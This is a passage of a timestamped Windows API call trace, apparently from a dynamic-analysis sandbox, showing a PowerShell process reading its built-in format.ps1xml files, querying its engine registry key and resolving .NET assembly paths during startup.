lpFilePart=0x0) returned 0x3d [0078.333] SetErrorMode (uMode=0x1) returned 0x1 [0078.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0078.334] SetErrorMode (uMode=0x1) returned 0x1 [0078.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0078.334] SetErrorMode (uMode=0x1) returned 0x1 [0078.334] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0078.334] SetErrorMode (uMode=0x1) returned 0x1 [0078.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0078.334] SetErrorMode (uMode=0x1) returned 0x1 [0078.334] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0078.334] SetErrorMode (uMode=0x1) returned 0x1 [0078.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0078.334] SetErrorMode (uMode=0x1) returned 0x1 [0078.335] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0078.335] SetErrorMode (uMode=0x1) returned 0x1 [0078.336] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0078.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.336] CoTaskMemFree (pv=0x1ef6c0) [0078.346] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0078.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.346] CoTaskMemFree (pv=0x1ef6c0) [0078.348] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0078.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.348] CoTaskMemFree (pv=0x1ef6c0) [0078.350] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0078.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.350] CoTaskMemFree (pv=0x1ef6c0) [0078.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.351] SetErrorMode (uMode=0x1) returned 0x1 [0078.351] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.352] GetFileType (hFile=0x310) returned 0x1 [0078.352] SetErrorMode (uMode=0x1) returned 0x1 [0078.352] GetFileType (hFile=0x310) returned 0x1 [0078.352] ReadFile (in: hFile=0x310, lpBuffer=0x340d210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x340d210*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.354] ReadFile (in: hFile=0x310, lpBuffer=0x340d210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x340d210*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.354] ReadFile (in: hFile=0x310, lpBuffer=0x340d210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x340d210*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.354] ReadFile (in: hFile=0x310, lpBuffer=0x340d210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x340d210*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.355] ReadFile (in: hFile=0x310, lpBuffer=0x340d210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x340d210*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.355] ReadFile (in: hFile=0x310, lpBuffer=0x340d210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x340d210*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.355] ReadFile (in: hFile=0x310, lpBuffer=0x340d210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x340d210*, lpNumberOfBytesRead=0xcccf8*=0x9e2, lpOverlapped=0x0) returned 1 [0078.355] ReadFile (in: hFile=0x310, lpBuffer=0x340c75a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x340c75a*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.355] ReadFile (in: hFile=0x310, lpBuffer=0x340d210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x340d210*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.355] CloseHandle (hObject=0x310) returned 1 [0078.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.356] SetErrorMode (uMode=0x1) returned 0x1 [0078.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccca0 | out: lpFileInformation=0xccca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0078.356] SetErrorMode (uMode=0x1) returned 0x1 [0078.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.356] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccd88 | out: phkResult=0xccd88*=0x310) returned 0x0 [0078.356] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd0c, lpData=0x0, lpcbData=0xccd08*=0x0 | out: lpType=0xccd0c*=0x1, lpData=0x0, lpcbData=0xccd08*=0x56) returned 0x0 [0078.356] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f0230 [0078.356] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcccdc, lpData=0x1b8f0230, lpcbData=0xcccd8*=0x56 | out: lpType=0xcccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcccd8*=0x56) returned 0x0 [0078.356] CoTaskMemFree (pv=0x1b8f0230) [0078.356] RegCloseKey (hKey=0x310) returned 0x0 [0078.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.364] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x35deaade, Data2=0xb3cf, Data3=0x4638, Data4=([0]=0xb0, [1]=0x2b, [2]=0x0, [3]=0x47, [4]=0x6a, [5]=0x23, [6]=0x3b, [7]=0xff))) returned 0x0 [0078.376] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xb722a238, Data2=0x157, Data3=0x4604, Data4=([0]=0xb2, [1]=0x1d, [2]=0x67, [3]=0x36, [4]=0xf3, [5]=0x6a, [6]=0x36, [7]=0x1b))) returned 0x0 [0078.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0078.378] SetErrorMode (uMode=0x1) returned 0x1 [0078.379] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.379] GetFileType (hFile=0x310) returned 0x1 [0078.379] SetErrorMode (uMode=0x1) returned 0x1 [0078.379] GetFileType (hFile=0x310) returned 0x1 [0078.379] ReadFile (in: hFile=0x310, lpBuffer=0x3437d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3437d78*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.380] ReadFile (in: hFile=0x310, lpBuffer=0x3437d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3437d78*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.381] ReadFile (in: hFile=0x310, lpBuffer=0x3437d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3437d78*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.381] ReadFile (in: hFile=0x310, lpBuffer=0x3437d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3437d78*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.381] ReadFile (in: hFile=0x310, lpBuffer=0x3437d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3437d78*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.382] ReadFile (in: hFile=0x310, lpBuffer=0x3437d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3437d78*, lpNumberOfBytesRead=0xcccf8*=0xfb2, lpOverlapped=0x0) returned 1 [0078.383] ReadFile (in: hFile=0x310, lpBuffer=0x3437492, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3437492*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.383] ReadFile (in: hFile=0x310, lpBuffer=0x3437d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3437d78*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.383] CloseHandle (hObject=0x310) returned 1 [0078.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0078.384] SetErrorMode (uMode=0x1) returned 0x1 [0078.384] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccca0 | out: lpFileInformation=0xccca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0078.384] SetErrorMode (uMode=0x1) returned 0x1 [0078.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0078.384] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccd88 | out: phkResult=0xccd88*=0x310) returned 0x0 [0078.384] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd0c, lpData=0x0, lpcbData=0xccd08*=0x0 | out: lpType=0xccd0c*=0x1, lpData=0x0, lpcbData=0xccd08*=0x56) returned 0x0 [0078.384] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f02a0 [0078.384] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcccdc, lpData=0x1b8f02a0, lpcbData=0xcccd8*=0x56 | out: lpType=0xcccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcccd8*=0x56) returned 0x0 [0078.384] CoTaskMemFree (pv=0x1b8f02a0) [0078.385] RegCloseKey (hKey=0x310) returned 0x0 [0078.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0078.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0078.387] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x5f3fbd2e, Data2=0x6ffa, Data3=0x4de3, Data4=([0]=0x8b, [1]=0x4b, [2]=0xb3, [3]=0x24, [4]=0xa1, [5]=0xc1, [6]=0x50, [7]=0x77))) returned 0x0 [0078.392] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xb1feaee1, Data2=0x295d, Data3=0x4ef8, Data4=([0]=0x93, [1]=0xbf, [2]=0x5b, [3]=0x8f, [4]=0xdf, [5]=0xf8, [6]=0xa8, [7]=0x21))) returned 0x0 [0078.393] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xf152d34, Data2=0xbaa7, Data3=0x4f0d, Data4=([0]=0xba, [1]=0x67, [2]=0xca, [3]=0xb7, [4]=0x4f, [5]=0x11, [6]=0x1b, [7]=0xb7))) returned 0x0 [0078.394] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x7a831edd, Data2=0x54db, Data3=0x4486, Data4=([0]=0x87, [1]=0xba, [2]=0x8e, [3]=0x9e, [4]=0x4f, [5]=0xa9, [6]=0x2a, [7]=0xf3))) returned 0x0 [0078.394] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x31899ae4, Data2=0xef45, Data3=0x4aab, Data4=([0]=0x91, [1]=0xb, [2]=0x98, [3]=0x81, [4]=0xc4, [5]=0x6f, [6]=0x55, [7]=0xb2))) returned 0x0 [0078.394] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x1b9faf66, Data2=0xa77c, Data3=0x46e1, Data4=([0]=0xa6, [1]=0x9b, [2]=0xa8, [3]=0xf5, [4]=0x60, [5]=0xe, [6]=0x9b, [7]=0x19))) returned 0x0 [0078.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.395] SetErrorMode (uMode=0x1) returned 0x1 [0078.395] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.395] GetFileType (hFile=0x310) returned 0x1 [0078.395] SetErrorMode (uMode=0x1) returned 0x1 [0078.396] GetFileType (hFile=0x310) returned 0x1 [0078.396] ReadFile (in: hFile=0x310, lpBuffer=0x3483ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3483ad8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.397] ReadFile (in: hFile=0x310, lpBuffer=0x3483ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3483ad8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.399] ReadFile (in: hFile=0x310, lpBuffer=0x3483ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3483ad8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.399] ReadFile (in: hFile=0x310, lpBuffer=0x3483ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3483ad8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.400] ReadFile (in: hFile=0x310, lpBuffer=0x3483ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3483ad8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.400] ReadFile (in: hFile=0x310, lpBuffer=0x3483ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3483ad8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.401] ReadFile (in: hFile=0x310, lpBuffer=0x3483ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3483ad8*, lpNumberOfBytesRead=0xcccf8*=0xaca, lpOverlapped=0x0) returned 1 [0078.401] ReadFile (in: hFile=0x310, lpBuffer=0x348310a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x348310a*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.401] ReadFile (in: hFile=0x310, lpBuffer=0x3483ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3483ad8*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.401] CloseHandle (hObject=0x310) returned 1 [0078.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.401] SetErrorMode (uMode=0x1) returned 0x1 [0078.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccca0 | out: lpFileInformation=0xccca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0078.401] SetErrorMode (uMode=0x1) returned 0x1 [0078.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.402] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccd88 | out: phkResult=0xccd88*=0x310) returned 0x0 [0078.402] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd0c, lpData=0x0, lpcbData=0xccd08*=0x0 | out: lpType=0xccd0c*=0x1, lpData=0x0, lpcbData=0xccd08*=0x56) returned 0x0 [0078.402] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f02a0 [0078.402] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcccdc, lpData=0x1b8f02a0, lpcbData=0xcccd8*=0x56 | out: lpType=0xcccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcccd8*=0x56) returned 0x0 [0078.402] CoTaskMemFree (pv=0x1b8f02a0) [0078.402] RegCloseKey (hKey=0x310) returned 0x0 [0078.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0078.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0078.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: 